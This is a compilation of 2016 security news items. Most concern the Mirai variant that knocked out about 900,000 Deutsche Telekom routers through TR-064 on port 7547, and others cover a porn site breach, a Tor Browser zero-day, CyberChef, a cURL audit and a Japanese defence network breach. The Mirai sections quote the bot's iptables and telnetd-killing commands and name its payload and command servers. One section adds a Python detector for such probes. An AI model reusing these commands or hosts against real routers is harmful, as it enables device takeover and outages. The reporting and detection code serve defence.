“I don’t have any concrete information about the origin of the attacks on the Telekom network,” Chancellor Angela Merkel said on Tuesday in Berlin. “Let me just say that such cyberattacks, or ‘hybrid attacks’ as they’re known in Russian doctrine, are part of everyday life today, and we need to learn to deal with them.”


State-sponsored hackers or non-nation state actor?

Even if the attack was launched by Russian hackers, attribution remains the biggest problem to solve. Governments need to manage such situations properly by defining norms of state behavior that can deal with cyber attacks launched by both categories of threat actors.

Germany’s Interior Minister Thomas de Maizière expressed great caution about explicitly blaming Moscow.

“It’s possible that we can’t clearly distinguish between criminal activities launched from a certain country and state activities,” Maizière declared at a conference of federal state interior ministers in Saarbrücken, when asked if Moscow was responsible for the attacks against the German routers.

The new president of the German intelligence service (BND), Bruno Kahl, confirmed that foreign hackers may try to launch cyber attacks in an attempt to “delegitimize the democratic process” in the country.

“In an interview with the Süddeutsche Zeitung newspaper, Bruno Kahl – the new president of German intelligence service, the BND – complained about hackers trying to “delegitimize the democratic process as such” and said he had “indications” that the hacks “came from certain quarters,” namely Russia. And the Telekom hack is by no means the only attack of its kind in Germany.” reported

In the past, German infrastructure was targeted several times by foreign hackers. In June 2015, the German Government announced that the hackers who breached the Bundestag systems in May had also stolen data from the targeted network. A spokeswoman for the Bundestag confirmed that unknown hackers stole data during the cyber attack; investigators have uncovered several data leaks.
The daily Der Spiegel speculated that the Russian Government was involved in the attack that occurred in May 2015. The newspaper reported the opinion of government representatives close to the Bundestag’s tech department.

“Experts suspect professional Russian hackers are behind the cyber attack on the data network of the German Bundestag, SPIEGEL ONLINE learned from multiple sources familiar with the case. German security authorities thus now have clear indications that Russian cyber spies – perhaps a secret service – are the authors.” states the Der Spiegel website.

The attackers, likely Russian state-sponsored hackers, used a sophisticated strain of malware to breach the Bundestag network and siphon sensitive data. The experts who analyzed the malicious code found it similar to the malware used in a previous attack on a German Government network in 2014.

German intelligence is aware of cyber espionage campaigns against its political leaders.
“We have indications that hacker groups from Russia are active in this area, but we also know what foreign intelligence services are capable of,” Social Democratic Bundestag deputy Lars Klingbeil told Deutsche Welle. “For me this shows that we really need to protect ourselves structurally. Looking ahead to the national elections next year, this could become a major issue.”

The Mirai botnet has another victim: in Germany it cut 900,000 users off from the internet
30.11.2016 Živě.cz
On Sunday evening Germany was hit by a wide-ranging internet outage in which 900,000 customers of the provider Deutsche Telekom were left without a connection. Operators in other countries also saw outages, with users reporting unavailable services. We now know the origin of the attack: it was the Mirai malware, which at the end of October made Twitter and YouTube unavailable through a massive attack on the DNS provider Dyn. It uses devices in the IoT category for this: routers, security cameras, and even wireless baby monitors.

In its latest version, Mirai has learned to exploit one of the router vulnerabilities that lets attackers install malicious code on the devices, in this case with the goal of enlisting them into the botnet. According to the Badcyber site, it uses the TR-064 service protocol, which is available to providers for remote management. Besides a slowed connection, an attack on the router often also causes it to crash, and therefore cuts the user off from the internet completely. That is exactly what caused the internet outage for hundreds of thousands of users around the world.

Deutsche Telekom advises customers who experience a slowed connection to restart the router, since the malicious code is stored only in RAM. It has also released a fix that secures the device against this type of attack through a firmware update. The infection mainly affected routers from the manufacturer Arcadyan, which supplies routers to many providers around the world.

Mirai has a new target: it is attacking routers, and has 5 million of them to aim at

30.11.2016 BotNet
The Mirai botnet has already done a lot of damage, but its rampage is far from over. It has learned new tricks and is attacking the remote management interface of routers, to which only operators should have access.
In recent weeks the botnet named Mirai has several times become the focus of both specialist and popular media. This interest was caused mainly by the fact that Mirai was the source of the strongest DDoS attacks in history so far. The latest such attack was the distributed attack targeting the DNS service provider Dyn, which took place in the second half of last month and made many web services, including Spotify and Twitter, unavailable to most people connected to the internet.

At the time of this attack, according to most estimates, about 100,000 devices were part of the botnet (mostly routers, cameras and other IoT devices); according to some sources, its current size could be several times larger.

Read: When “smart” cameras attack: an analysis of current DDoS attacks

Botnets are most often created either for use by their “owner” or to obtain money by renting them out to third parties (in both cases, for example, to carry out DDoS attacks). According to some sources, the current version of Mirai (the source code of the original malware that enrolled devices into the botnet was freely published on the internet and further modified) is used by its operators in the second way. Recently the malicious code that connects devices to Mirai was extended with a new propagation vector that allows it to infect some types of routers most commonly used by households and small businesses to connect to the internet.

The vector in question is the TR-064 protocol, or TR-069, which uses TCP port 7547 and is primarily used by internet service providers, allowing them to configure customers’ routers remotely. A recently published proof-of-concept exploit shows, however, that on some devices an attacker can also use this protocol to achieve execution of arbitrary code sent to the device. The new version of the “Mirai malware”, which targets some home routers, uses this method as well.

Over the weekend, as a result of the botnet’s attempt to spread via the described channel, there were problems with internet connectivity in many geographic areas. When attempting to infect a new device, the malware, besides noticeably slowing the connection on infected devices, in many cases also crashed the system running on the device, which made the router temporarily non-functional.

Fortunately, disinfecting infected devices is very simple: since the malware is loaded only into the router’s RAM, restarting it is enough to remove the infection. This step must of course be supplemented by reconfiguring the device, or installing the corresponding firmware update, to ensure the device is not reinfected. Germany was hit very noticeably by the described spread of the malware; according to Deutsche Telekom, about 900,000 people were affected by connectivity problems. According to available information, devices in Austria, Poland and Brazil, for example, were also infected.

According to information obtained from Shodan, on 28 November more than 5 million devices allowing connections via the TR-064 protocol were connected to the internet (currently, on 29 November, slightly fewer than 5 million are detected). In the Czech Republic the number of such devices detected by Shodan is slightly above 72,000; in Slovakia it exceeds 22,000.

It should be noted, however, that the figures obtained from Shodan are not precise and, as mentioned at the last link above, the real numbers will very likely be lower. Also, not all devices using TR-064 are vulnerable to the described propagation mechanism. It is nevertheless likely, given that some of the “small” routers sold in the Czech Republic are vulnerable, that even in the Czech Republic the number of potential targets for Mirai’s expansion will be in the tens of thousands.

The second-largest porn site was hacked. The attackers obtained the e-mails and passwords of hundreds of thousands of users
After the large-scale attack on FriendFinder Networks, in which 412 million login credentials leaked, another adult-themed site has been attacked – according to the Alexa monitor it is the 76th most visited website in the world and the second most popular in its category, right behind Pornhub.

Motherboard writes, based on its sources, that the attackers got hold of the usernames, e-mails and passwords of 380,000 accounts. As usual, among them were e-mail addresses belonging to the US military and various government offices. The magazine tried registering new accounts with the listed e-mails (50 random ones) and the site claimed they could not be used because they were already in the database.

An unknown attacker reportedly discovered a vulnerability in Xhamster sometime this year, downloaded and cracked the poorly hashed passwords (MD5), and then sold this data set. The site’s operators, however, counter that their passwords are well protected and that cracking them is supposedly nearly impossible.

If you happen to have an account on Xhamster, you should change your password immediately. If you use the same username/e-mail and password combination on other, perhaps more important, sites, change the passwords there as well.

Firefox Zero-Day Exploit to Unmask Tor Users Released Online
30.11.2016 thehackernews
Hackers are actively exploiting a zero-day vulnerability in Firefox to unmask Tor Browser users, similar to what the FBI exploited during an investigation of a child pornography site.
Tor (The Onion Router) is anonymity software that not only provides a safe haven to human rights activists, journalists and government officials, but is also a place where drugs, assassins for hire, child pornography, and other illegal goods and services have allegedly been traded.
A JavaScript zero-day exploit currently being actively used in the wild is designed to remotely execute malicious code on the Windows operating system via a memory corruption flaw in the Firefox web browser.
The exploit code was publicly published by an admin of the SIGAINT privacy-oriented public email service on the Tor-Talk mailing list.
The mailing list message reveals that the zero-day exploit affecting Firefox is currently being exploited against Tor Browser users by unknown attackers to leak the potentially identifying information of Tor users, officials of the anonymity service confirmed Tuesday.
Tor Browser Bundle is a repackaged version of Mozilla Firefox web browser that runs connections through the Tor anonymizing network configured to hide its user's public IP address.
"[The exploit code] consists of one HTML and one CSS file, both pasted below and also de-obscured," the author says. "The exact functionality is unknown, but it is getting access to VirtualAlloc in kernel32.dll and goes from there."
That means that when the exploit is opened by Firefox or Tor Browser with JavaScript enabled on a Windows computer, it leverages a memory corruption vulnerability in the background to make direct calls into kernel32.dll, which allows malicious code to be executed on computers running Windows.
Researchers also found that the exploit submits the user's machine details to a remote server (an OVH-hosted virtual machine in France) on port 80, which was no longer responding at the time of writing.
Although security researchers are still analyzing the Tor exploit code, a disassembly of it shows the latest zero-day flaw is very similar to a separate Tor Browser exploit that emerged in 2013.
The 2013 exploit was the work of the United States FBI, which was targeting Tor users who accessed child pornography.
Although Mozilla is scrambling to patch the critical vulnerability, it is still unknown who is behind the current Javascript exploit.
"So it sounds like the immediate next step is that Mozilla finishes their patch for it then…a quick Tor Browser update and somewhere in there people will look at the bug and see whether they think it really does apply to Tor Browser," Tor Project lead Roger Dingledine said.
The critical vulnerability is believed to affect multiple Windows versions of the open source Firefox web browser as far back as Firefox version 41, and up to Firefox version 50.

GCHQ presents CyberChef, an Open Source Data Analysis Tool
30.11.2016 securityaffairs BigBrothers
The GCHQ has released the code of a new open source web tool dubbed CyberChef, specifically designed for analyzing and decoding data.
Open data are a privileged source for intelligence agencies; almost every government is investing heavily in technology to analyze them.

Recently the British intelligence agency, the Government Communications Headquarters (GCHQ), launched a new open source web tool specifically designed for analyzing and decoding data.

The tool dubbed CyberChef has been presented by the GCHQ as the “Cyber Swiss Army Knife.”

“CyberChef is a simple, intuitive web app for carrying out all manner of “cyber” operations within a web browser. These operations include creating hexdumps, simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, data compression and decompression, calculating hashes and checksums, IPv6 and X.509 parsing, and much more.” reads the description published by the GCHQ on GitHub.

“The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years. Every effort has been made to structure the code in a readable and extendable format, however it should be noted that the analyst is not a professional developer and the code has not been peer-reviewed for compliance with a formal specification.”


A point of strength is its user-friendly interface: even non-technical people can work with encryption, compression and decompression, and data formats with simple drag-and-drop operations.

CyberChef is a powerful tool for data analysis that could be used by many categories of users, including mathematicians, data analysts, developers and even casual puzzle solvers.

According to the GCHQ, CyberChef runs in Chrome and Firefox; the agency expects that contributors will soon make it run in Microsoft Edge as well.

The tool could be used to manipulate different types of data, decode Base64 strings, convert data from a hexdump and perform many other operations.

The GCHQ released the source code of the tool on GitHub along with a demo, and is inviting the developer community to contribute to the improvement of the tool.

“It is hoped that by releasing CyberChef through Github, contributions can be added which can be rolled out into future versions of the tool, and is an excellent example of GCHQ providing a platform on which to base cybersecurity operations,” GCHQ said.

Europol and other law enforcement agencies shut 4,500 websites peddling fake brands

30.11.2016 securityaffairs Crime

In a massive crackdown, European police and law enforcement agencies worldwide seized more than 4,500 domains trading fake brands.
Europol conducted a massive crackdown against websites offering counterfeit products as part of the campaign dubbed “Don’t F***(AKE) Up.” The European law enforcement agency aims to halt the activity of online scammers who offer fake brands for sale.

The agency launched a public awareness and prevention campaign online to help netizens spot fake websites and social media scams.

The sale of these products causes serious damage to the finances and reputation of the official brands, and in some cases the goods pose a serious threat to “the health and safety of buyers.”

Authorities seized more than 3,500 items of clothing and fake luxury goods, including shoes, bags and perfumes purporting to be brands such as Nike, Adidas, and Kenzo.

Dutch anti-fraud police have identified and arrested 12 people across the country and searched their homes.

“The internet has become an essential channel for e-commerce. Its instant global reach and anonymity make it possible to sell nearly anything to anyone at any time,” reads the official statement from the Europol.

“Counterfeiters know it and are increasingly exploiting the unlimited opportunities” the internet offers.

The operation involved law enforcement agencies across 27 countries in Europe, the US and Canada. Authorities shut down more than 4,500 websites that criminal organizations used to offer various products for sale, including “luxury goods, sportswear, spare parts, electronics, pharmaceuticals, toiletries and other fake products.”

This operation is the result of a continuous effort by law enforcement worldwide; every year European authorities seize thousands of domains with the support of the US Immigration and Customs Enforcement and Homeland Security.

There was “a significant increase in the number of seized domain names compared to last year,” said Europol director Rob Wainwright.

The police observed a significant increase in the number of sales of counterfeit goods through social networking platforms, including Facebook and Instagram.


“This is a relatively new phenomenon in the trade in counterfeit brand names,” states an official statement from the Dutch Fiscal Information and Investigation Service (FIOD).

This is a profitable period for crooks: from Black Friday through the entire holiday season, users are more exposed to such scams.

“When shopping online, you are more likely to fall victim to counterfeiters,” it said as “without the physical product to look at and feel, it can be more difficult for you to spot the differences.”

Customers of Liechtenstein banks blackmailed by ransomware
29.11.2016 securityaffairs
Hackers are targeting Liechtenstein banks with ransomware-style attacks and are threatening to disclose customers’ sensitive information.
Hackers are targeting Liechtenstein banks with ransomware-style attacks. The situation is particularly concerning because of the sensitive nature of the data stolen by the crooks. The cyber criminals are allegedly blackmailing customers by threatening to release their account data if the ransom is not paid.

According to Bild am Sonntag, the hackers gained access to account data from Valartis Bank Liechtenstein and stole information on several clients, including politicians, actors, and other individuals.


The director, Andreas Insam, told the newspaper Bild am Sonntag that his organization has already alerted the authorities.

“Attackers accused the bank board of not paying them for security services, likely bug poaching rather than legitimate testing, claiming their “intention is not to harm” and have to “resort to” extortion.” reported El Reg.

The cyber criminals are allegedly demanding up to 10 per cent of account balances in exchange for not disclosing customers’ information. The hackers, of course, accept payment in Bitcoin, and they are threatening to disclose the information to authorities and media if the victims do not pay the ransom by December 7.

Bild am Sonntag obtained three distinct messages (letter 1, letter 2, letter 3) from the hackers, who claim to have siphoned several gigabytes of data from the targeted accounts. The information also includes the victims’ correspondence.

The letters published by the media confirm the hackers’ intention to blackmail the victims by threatening to reveal alleged dirty affairs, including tax evasion.

At the time of writing, the Bitcoin addresses used by the crooks for payment had not been disclosed, in order to avoid tracking the victims’ ransom payments.

An audit revealed dozen vulnerabilities in the cURL
29.11.2016 securityaffairs
Security experts who conducted an audit on cURL discovered nearly a dozen vulnerabilities that were patched in the last release.
cURL (read “see URL”) is an open source command line tool and library designed for transferring data over various protocols.

cURL is included in a wide range of applications, including networking devices, printers, smartphones, IoT devices and even cars.

Recently Daniel Stenberg, lead developer of cURL and Mozilla employee, requested a security audit of cURL from the Mozilla Secure Open Source (SOS) program.

“I asked for, and we were granted a security audit of curl from the Mozilla Secure Open Source program a while ago. This was done by Mozilla getting a 3rd party company involved to do the job and footing the bill for it. The auditing company is called Cure53.” wrote Stenberg in a blog post. “I applied for the security audit because I feel that we’ve had some security related issues lately and I’ve had the feeling that we might be missing something so it would be really good to get some experts’ eyes on the code,”

Five experts at the security services provider Cure53 conducted an audit that lasted 20 days and revealed a total of 23 issues.

The issues discovered by the experts include nine security flaws. Two of the security vulnerabilities were merged by the experts, and one was classified as a “plain bug” because it is very hard to exploit in a real attack scenario.

Four vulnerabilities have been rated “high severity” and four are considered “medium severity.”

“The assessment of the tool was performed by Cure53 as part of the Mozilla’s Secure Open Source track program. The results of the project encompass twenty-three security-relevant discoveries.” reads the Pentest-Report cURL 08.2016 published by Cure53. “As for the approach, the test was rooted in the public availability of the source code belonging to the cURL software and the investigation involved five testers of the Cure53 team.”


The high severity flaws tracked as CVE-2016-8617, CVE-2016-8619, CVE-2016-8622, and CVE-2016-8623, are remote code execution vulnerabilities.

The report states that “the overall impression of the state of security and robustness of the cURL library was positive.”

Anyway, don’t worry! A new version of the software is available online. Version 7.51.0 addresses a total of 11 vulnerabilities. The release fixes seven issues found by the Cure53 audit, while the remaining ones were reported by Luật Nguyễn, Christian Heimes and Fernando Muñoz.

Stenberg highlighted that cURL is one of the most used software components in the world; for this reason, the audit is of extraordinary importance for its users.

“Also, as curl is one of the most used software components in the world a serious problem in curl could have a serious impact on tools, devices and applications everywhere. We don’t want that to happen.”

More than 900k routers of Deutsche Telekom German users went offline
29.11.2016 securityaffairs Hacking

Deutsche Telekom confirmed that more than 900,000 routers began to have serious connectivity problems due to a cyber attack.
More than 900,000 routers belonging to Deutsche Telekom users in Germany were not able to connect to the Internet due to an alleged cyber-attack.

The affected routers were used by the Deutsche Telekom customers also for fixed telephony and TV services.

The problems lasted at least two days; the outage began on Sunday, November 27, at around 17:00 local time.

Deutsche Telekom users all over the country were not able to get online using the routers provided by the company.

Below a graphic representation of the outage provided by the

[Figure: graphic representation of the Deutsche Telekom router outage]

The outage lasted a couple of hours on Sunday, then the problems continued on Monday morning from 08:00.

The company notified its 20 million customers via Facebook that the problems had been solved at around 12:00 local time, but users continued to face connectivity issues.

What has happened?

According to the company, hackers targeted the routers exploiting a security issue. Deutsche Telekom and router vendors are working together to develop a firmware fix and roll out the software patch.

Deutsche Telekom is currently rolling out firmware updates.

“The massive interference from connections of Deutsche Telekom, according to findings from the Federal Office for Security in Information Technology (BSI), follow a worldwide attack.” reads the

“According to BSI, the attacks were also noticeable in the government-protected government network, but could be repelled with effective protection measures. “

Deutsche Telekom customer care recommended that users unplug their devices, wait for 30 seconds and restart their router. If this procedure does not restore connectivity, it is suggested to disconnect the router from the Deutsche Telekom network permanently.

“German Telekom is now offering a firmware update for the affected routers. Details (in German) are here:–zubehoer/router/speedport-w-921v/firmware-zum-speedport-w-921v. Affected users are advised to power off their router and power it on again after 30 seconds. During bootup the router should retrieve the new firmware from the Telekom servers.” reported the SANS Institute.

Deutsche Telekom is offering free mobile Internet until the technical problem is resolved.

Deutsche Telekom didn’t provide further technical details about the alleged cyber attack or the affected router models.

It is not clear which threat compromised the Deutsche Telekom routers; experts speculated that malware could have prevented the equipment from connecting to the company’s network.

Security experts from SANS ISC published an interesting report that revealed a significant increase in scans and exploitation attempts for a SOAP Remote Code Execution (RCE) vulnerability via port 7547 against Speedport routers.

This router model is widely used by Deutsche Telekom for its German customers.

“For the last couple days, attack against port 7547 have increased substantially. These scans appear to exploit a vulnerability in popular DSL routers. This issue may already have caused severe issues for German ISP Deutsche Telekom and may affect others as well (given that the US is just “waking up” from a long weekend). For Deutsche Telekom, Speedport routers appeared to be the main issue.” added SANS ISC.

“According to Shodan, about 41 Million devices have port 7547 open. The code appears to be derived from Mirai with the additional scan for the SOAP vulnerability. Currently, honeypots see about one request every 5-10 minutes for each target IP.”

According to the SANS ISC report, it seems that attackers tried to exploit a known vulnerability in the TR-069 configuration protocol. The experts highlighted the availability of a Metasploit module implementing the exploit for this vulnerability.

An unconfirmed list of vulnerable routers includes the Eir D1000 Wireless Router (a rebranded Zyxel modem used by the Irish ISP Eir) and the Speedport router (Deutsche Telekom).

Of course, when dealing with IoT devices and cyber threats, the most dreaded malware is the Mirai bot that was recently involved in several massive DDoS attacks.

According to BadCyber, the culprit is the Mirai botnet, which was designed to exploit the Eir D1000 (Zyxel modems) via port 7547.

“TR-064 protocol is based on HTTP and SOAP and its default port is TCP 7547. Commands are sent as POST requests to this port.” states the BadCyber.

“The malware itself is really friendly as it closes the vulnerability once the router is infected. It performs the following commands:

busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP

busybox killall -9 telnetd

which should make the device “secure”, at least until the next reboot. The first one closes port 7547 and the second one kills the telnet service, making it really hard for the ISP to update the device remotely.”

New wave of Mirai attacking home routers
29.11.2016 Kaspersky 
Starting from yesterday, many DSL customers in Germany were reporting problems with their routers, which weren’t able to connect to their ISP anymore or whose internet connection was very weak. Today we saw news that a malicious attack could be the reason for this widespread problem.

Fortunately, we got some more technical details from users reporting the specific behaviour. With this information, we were able to get our hands on some samples and reconstruct some details. Let’s have a quick look:

Exploiting the remote management protocol
As mentioned, users were seeing suspicious network activity. They saw this request incoming on TCP port 7547:


This request is described in the TR-064 specification of methods for configuring DSL CPE (customer-premises equipment).

A vulnerability in affected routers causes the device to download the binary with file name “1” from http://l.ocalhost[.]host to the /tmp/ directory and execute it. The IP addresses of this host changed a few times during the day. Since 28th November 2016, 16:36 CET the domains no longer resolve (“NXDOMAIN”).

Mirai related binary
During a quick analysis of the ELF 32-bit MIPS-MSB (big endian) variant used in today’s attacks on German customers, we saw this Mirai-related sample performing the following behaviour:

Delete itself from filesystem (resides only in memory)
Close the vulnerable port using iptables: “iptables -A INPUT -p tcp --destination-port 7547 -j DROP”
Resolve command and control servers using DNS
Scan the internet for open TCP 7547 and infect other devices using the same malicious request as seen above.
Since the malware is not able to write itself to the router’s persistent filesystem, the infection will not survive a reboot.

Our products detect the corresponding binaries as HEUR:Backdoor.Linux.Mirai.b
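The ISC SANS observation above (port 7547 probes arriving at honeypots every 5-10 minutes) and the Kaspersky description of the malicious TR-064 request on TCP 7547 come down to the same network-side signal: inbound SOAP POSTs to that port. The following Python is an added example, not code from either report; its log line format, timestamps and addresses are constructed for the example, so adapt parse_line() to the firewall or honeypot logs you actually have.

```python
"""Flag inbound TR-064 (TCP 7547) exploitation attempts in connection logs.

Added example, not code from the ISC SANS or Kaspersky reports. The log
format below is constructed for this example.
"""
import re
from datetime import datetime
from statistics import median

TR064_PORT = 7547  # default TR-064 / TR-069 CPE port named in both reports

# Constructed sample: two honeypot targets, three scanning sources, plus benign noise.
SAMPLE_LOG = """\
2016-11-28T16:00:01Z src=198.51.100.7 dst=192.0.2.10 dport=7547 method=POST soap=yes
2016-11-28T16:00:09Z src=203.0.113.5 dst=192.0.2.10 dport=443 method=GET soap=no
2016-11-28T16:07:30Z src=198.51.100.22 dst=192.0.2.10 dport=7547 method=POST soap=yes
2016-11-28T16:12:44Z src=198.51.100.7 dst=192.0.2.11 dport=7547 method=POST soap=yes
2016-11-28T16:15:02Z src=203.0.113.9 dst=192.0.2.10 dport=7547 method=GET soap=no
2016-11-28T16:16:55Z src=198.51.100.40 dst=192.0.2.10 dport=7547 method=POST soap=yes
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) "
    r"method=(?P<method>\S+) soap=(?P<soap>yes|no)$"
)


def parse_line(line):
    """Return a dict for a well-formed line, or None so malformed input is skipped."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    rec["dport"] = int(rec["dport"])
    rec["soap"] = rec["soap"] == "yes"
    return rec


def tr064_probes(log_text):
    """Events matching the reported pattern: a SOAP POST to TCP 7547."""
    out = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["dport"] == TR064_PORT and rec["method"] == "POST" and rec["soap"]:
            out.append(rec)
    return out


def probe_rate_per_target(events):
    """Median seconds between probes per destination (the reports cite 5-10 minutes).

    A target that saw only one probe has no interval and maps to None."""
    by_dst = {}
    for ev in events:
        by_dst.setdefault(ev["dst"], []).append(ev["ts"])
    rates = {}
    for dst, stamps in by_dst.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        rates[dst] = median(gaps) if gaps else None
    return rates


def distinct_sources(events):
    """Scanning sources, useful for blocking at the edge or reporting to the ISP."""
    return sorted({ev["src"] for ev in events})


if __name__ == "__main__":
    probes = tr064_probes(SAMPLE_LOG)
    print(len(probes), "TR-064 probes from", distinct_sources(probes))
    print(probe_rate_per_target(probes))
```

Because the infection does not survive a reboot and the bot blocks port 7547 only on the victim itself, the durable fix is on the network side: the ISP's CPE management traffic should be the only thing allowed to reach that port, and anything else hitting it from the open internet is worth counting as above.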

Update (2016-11-28 19:50 CET)

At the moment the C2 servers timeserver[.]host and securityupdates[.]us are both pointing to US military-related IPs in the range. Since there is no Mirai-related infrastructure behind this network range, the bots will not receive any further commands until the criminals behind this attack change the DNS records again. For sure, this is some kind of trolling by the criminals who conducted the attack.

Japan is investigating security breach of Defence Information Infrastructure

28.11.2016 securityaffairs Cyber

The Japanese Government is investigating a reported security breach suffered by the High-speed Defence Information Infrastructure (DII) network.
The Defence Information Infrastructure is a high-speed large-capacity communication network connecting SDF bases and camps. The Defence Information Infrastructure comprises two distinct networks, one connected to the Internet and an internal network.

The security breach took place in September, but the media have disclosed it only now. The South China Morning Post reported that the attack was confirmed by unnamed ministry officials on Sunday morning.

According to the SCMP, the hackers penetrated the Ground Self-Defence Force’s computer system. They first breached a network shared between Japan’s National Defence Academy and its National Defence Medical College, then, in a later lateral movement, gained access to the Defence Information Infrastructure network.

“The Japanese Defence Ministry and the Self-Defence Forces discovered in September that their shared communication network had suffered a cyberattack that enabled a hacker to penetrate the Ground Self-Defense Force’s computer system, ministry sources said on Sunday.” reported the South China Morning Post.

“Some information may have been leaked in the incident, with an organised attacker such as a nation state strongly suspected, but the full scope of the damage is not clear, the sources said.”

Defence Information Infrastructure
New SDF unit – The Japan Times

How is it possible?

Bloomberg quoted Kyodo News which, citing ministry sources in an earlier report, explained that the hackers took advantage of the fact that computers at Japan’s National Defense Academy and National Defense Medical College are connected both to a university network and to an internal network linking military bases.

Bloomberg, which reported the news, linked the attack to a nation-state actor because of the complexity of the attack and the nature of the target.

The South China Morning Post reports a highly skilled attack that led the ministry to immediately raise the cybersecurity alert level in the country.

Masakazu Saito, a senior ministry official in charge of cyber security issues, did not comment on the incident.

Bloomberg, commenting on the alleged attack, states that the report also cited senior military officials as saying the attack was managed “as a crisis”. In response to the incident, staff at the ministry and the Self-Defense Forces were temporarily banned from connecting to the Internet.

“It is a very serious situation. We must quickly take measures to prevent a recurrence.” said a senior SDF official.

Cyber attacks against Japanese organizations are nothing new; below is a short list of major hacking campaigns that targeted the country:

August 2011: Mitsubishi Heavy Industries (defense contractor) networks were infected by malware that exfiltrated information on defense systems.
October 2011: A cyber espionage campaign originating from China exposed sensitive information for at least a month. The infection was made possible by a phishing campaign against Lower House members that started in July. In this case, too, malware was used for the attack.
December 2012: the Japan Aerospace Exploration Agency was hit by a virus that stole secret information on its newest rockets from an internal computer. The sensitive information was stored on a computer at the Tsukuba Space Center, located northeast of Tokyo.
July 2012: The Japanese Finance Ministry announced that its computers had been infected with a virus from 2010 to 2011, causing leaks of information.
September 2013: Security experts at FireEye discovered Operation DeputyDog, a campaign against Japanese entities that exploited a zero-day (CVE-2013-3893) recently announced by Microsoft.
August 2015: Security experts at Kaspersky Lab analyzed the cyber attacks run by the Blue Termite APT, a hacking crew focused on Japanese organizations.
February 2016: Japanese commercial and critical infrastructure organizations were targeted by a long-running campaign dubbed Operation Dust Storm.
October 2016: The threat actor behind the Blackgear cyber-espionage campaign targeting Japanese entities is the same one that hit Taiwan in 2012.

Bloomberg states that Japan’s Defense Ministry denied that a military computer network had suffered a high-level cyber attack in September.

“A public affairs official at the ministry said the report wasn’t true, and that it receives numerous suspicious e-mails and other forms of contact believed to be cyber attacks on a daily basis. The official, who declined to be named in line with government policy, also said the ministry doesn’t comment on such attacks as that would expose its ability to deal with them.” reported Bloomberg.

Malicious code and the Windows integrity mechanism
28.11.2016 Kaspersky 

Ask any expert who analyzes malicious code for Windows which system privileges malware works with and wants to acquire and, without a second thought, they’ll tell you: “Administrator rights”. Are there any studies to back this up? Unfortunately, I was unable to find any coherent analysis on the subject; however, it is never too late to play Captain Obvious and present the facts for public evaluation.

My goal wasn’t to review the techniques of elevating system privileges; the Internet already has plenty of articles on the subject. New mechanisms are discovered every year, and each technique deserves its own review. Here, I wanted to look at the overall picture and talk about the whole range of Windows operating systems in all their diversity dating back to Windows Vista, but without discussing specific versions.

Step Back in Time

The Windows XP security model differs significantly from the security model of Windows Vista and newer operating systems. There are two types of user accounts in Windows XP: a standard account and an administrator account. The vast majority of users worked with administrator rights, despite the fact that they didn’t need the rights for everyday tasks. These people infected their systems with malicious software that acquired the rights of the current user and, more often than not, they were administrator rights. As a result, the malicious software did not encounter any serious problems acquiring elevated privileges in a system running Windows XP.

This mechanism was used until the release of the Windows Vista family, where Microsoft introduced a new security model: Windows integrity mechanism.


Integrity Level in Windows 10

Roughly speaking, the two aforementioned user account types are present in the new mechanism; however, the operating system now utilizes Admin Approval Mode. Yes, that very same, our “beloved” UAC (User Account Control). As soon as there is a need for elevated privileges, a UAC dialog pops up and prompts the user for permission to perform a certain action.

The human factor is one of the primary security problems, and that is why placing responsibility on a user who doesn’t know the first thing about computer security is, to say the least, a questionable decision. Microsoft itself has issued the following statement on the topic: “One important thing to know is that UAC is not a security boundary. UAC helps people be more secure, but it is not a cure all. UAC helps most by being the prompt before software is installed.” For those interested in Microsoft’s position on the matter, I recommend reading the following blog posts: User Account Control, User Account Control (UAC) – quick update, Update on UAC.

The Windows Integrity Mechanism

The new Windows integrity mechanism is the main protection component of the Windows security architecture. The mechanism restricts access permissions of applications that run under the same user account, but that are less trustworthy. Put more simply, this mechanism assigns an integrity level to processes as well as other securable objects in Windows. The integrity level restricts or grants access permissions of one object to another.

// Mandatory Label Authority.
#define SECURITY_MANDATORY_LOW_RID (0x00001000L)
// can be set by a usermode caller.

I won’t go into detail about the operation of the integrity mechanism. We only need one table to simplify interpretation of the gathered statistics: the table shows the connection between integrity levels and SID security identifiers (see Table 7) that identify the user, group, domain, or computer accounts in Windows.

SID in Access Token              Assigned Integrity Level
LocalSystem                      System
LocalService                     System
NetworkService                   System
Administrators                   High
Backup Operators                 High
Network Configuration Operators  High
Cryptographic Operators          High
Authenticated Users              Medium
Everyone (World)                 Low
Anonymous                        Untrusted

Most applications launched by a standard user are assigned a medium integrity level. Administrators get a high integrity level; services and the kernel receive system integrity. A low integrity level will be assigned to an App Container, for example. This is a typical level for modern browsers that protect the operating system from possible malware intrusions from malicious websites.

Basically, the high level and the levels above it are the ones that malicious software aims for.

Lies, Damned Lies, and Statistics

Contemporary anti-virus products implement a comprehensive approach to system security. That’s why they use dozens of components that prevent malicious code from infecting the system at various stages. Those components may include Web antivirus, script emulators, cloud signatures, exploit detectors, and much more. Data entering the system goes through numerous scans initiated by the different components of an antivirus product. As a result, a huge number of malicious programs do not get to the execution stage and are detected “on takeoff”. I, however, was interested in malware that did manage to get to the execution stage. A contemporary antivirus product continues to track a potentially malicious object even after it is executed: behavioral stream signatures (BSS) of the Kaspersky System Watcher component can still be triggered at that point.

So, I asked our Behavior Detection group to assist me in collecting statistics for system privilege levels used for execution by active malware, and which can be detected with the help of BSS.

Within 15 days, I managed to gather data on approximately 1.5 million detections with the help of Kaspersky Security Network. The entire range of Windows operating systems, starting with Windows Vista up to Windows 10, was included in the statistics. After filtering out some events and leaving only unique ones as well as those that do not contain our test signatures, I ended up with 976,000 detections. Let us take a look at the distribution of integrity levels for active malicious software during that period.


Distribution of Integrity Levels

By summing up Untrusted, Low, Medium, as well as High and System, it is possible to calculate a percentage ratio, which I called “OK to Bad”. Although, I assume, the creators of malware would not view this ratio as being so bad.


“OK to Bad” Ratio
